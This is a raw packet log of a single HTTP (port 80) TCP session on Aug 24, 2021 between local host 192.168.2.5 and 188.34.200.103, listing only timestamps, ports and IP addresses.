Aug 24, 2021 08:49:23.087553978 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087559938 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087570906 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087587118 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087604046 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087605953 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087610960 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087630033 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087650061 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087667942 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087692022 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087711096 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087733984 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087755919 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087776899 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087779045 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087798119 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087825060 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087831020 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087845087 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087867975 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087869883 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087872028 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087874889 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087889910 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087908983 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087929010 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087949991 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087973118 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.087974072 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.087995052 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088016987 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.088021040 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088021994 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.088026047 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.088041067 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088064909 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.088068008 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088068962 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.088088036 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088116884 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088119030 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.088135958 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088160992 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088160992 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.088180065 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088197947 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.088200092 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088218927 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088226080 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.088237047 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088262081 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088279009 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.088279009 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088299990 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088325024 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.088325024 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088346004 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088363886 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088367939 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.088385105 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088407993 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.088409901 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088428974 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088444948 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.088449001 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088465929 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.088465929 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088486910 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088510036 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.088511944 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088531971 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088551998 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088568926 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.088571072 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088576078 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.088591099 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088614941 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088623047 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.088634014 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088660002 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088660955 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.088680983 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088684082 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.088700056 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088726044 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088726997 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.088746071 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088768959 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.088769913 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088788986 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088808060 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088809013 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.088825941 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088844061 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.088845968 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088877916 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088902950 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.088903904 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088923931 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088941097 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.088943005 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088963032 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088968039 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.088979959 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.088996887 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.089014053 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.089034081 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.089060068 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.089067936 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.089078903 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.089095116 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.089098930 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.089099884 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.089118958 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.089137077 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.089138985 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.089155912 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.089176893 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.089179039 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.089199066 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.089224100 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.089224100 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.089245081 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.089265108 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.089282990 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.089303017 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.089308023 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.089313030 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.089317083 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.089322090 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.089344978 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.089350939 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.089365005 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.089389086 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.089391947 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.089426041 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.090020895 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.110769987 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.110816956 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.110840082 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.110857964 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.110903025 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.110928059 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.110945940 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.110966921 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.110996008 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.111015081 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.111053944 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.111066103 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.111068964 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.111085892 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.111109018 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.111181974 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.111234903 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.111255884 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.111280918 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.111299992 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.111352921 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.111372948 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.111391068 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.111428022 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.111448050 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.111473083 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.111542940 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.111553907 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.111555099 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.111557007 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.111560106 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.111562967 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.111598015 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.111617088 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.111640930 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.111659050 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.111763000 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.111778021 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.111835003 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.111860037 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.111886024 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.111902952 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.111918926 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.111993074 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.112005949 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.112029076 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.112051010 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.112075090 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.112091064 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.112127066 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.112135887 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.112605095 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.112634897 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.112663984 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.112682104 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.112793922 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.112823963 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.112826109 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.112859964 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.113423109 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.113429070 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.113552094 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.113557100 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.114509106 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.114515066 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.114631891 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.114636898 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.116286993 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.116297960 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.116302013 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.116305113 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.116307974 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.116311073 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.116314888 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.116318941 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.116322994 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.118046999 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118052959 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118060112 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118062019 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118062973 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118065119 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118067026 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118068933 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118071079 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118072987 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118073940 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118077040 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118077993 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118078947 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118081093 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118083000 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118084908 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118087053 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118088007 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118089914 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118092060 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118093014 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118094921 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118096113 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118098021 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118099928 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118102074 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118103027 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118104935 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118107080 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118108988 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118109941 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118112087 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118113995 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118115902 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118117094 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118119001 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118119955 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118122101 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118123055 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118124962 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118125916 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118128061 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118129015 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118130922 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118133068 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118134975 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118135929 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118138075 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118139029 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118140936 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118141890 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118144035 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118146896 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118151903 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118154049 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118160009 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118190050 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118191957 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118194103 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118195057 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118196964 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118199110 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118201017 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118201971 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118202925 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118206024 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118207932 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118210077 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118211985 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118212938 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118215084 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118216038 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118217945 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118220091 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118221998 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118222952 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118225098 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118226051 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118227959 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118230104 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.118324041 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.118344069 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.120413065 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.120436907 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.141302109 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.141345024 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.141369104 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.141403913 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.141428947 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.141431093 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.141547918 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.141557932 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.165369034 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.169704914 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.821121931 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.841662884 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.841705084 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.841732025 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.841758013 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.841779947 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.841800928 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.841818094 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.841836929 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.841841936 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.841865063 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.841867924 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.841887951 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.841909885 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.841931105 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.841943026 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.841953039 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.841978073 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.841989040 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.842003107 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.842005968 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.842017889 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.842035055 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.842047930 CEST	80	49718	188.34.200.103	192.168.2.5
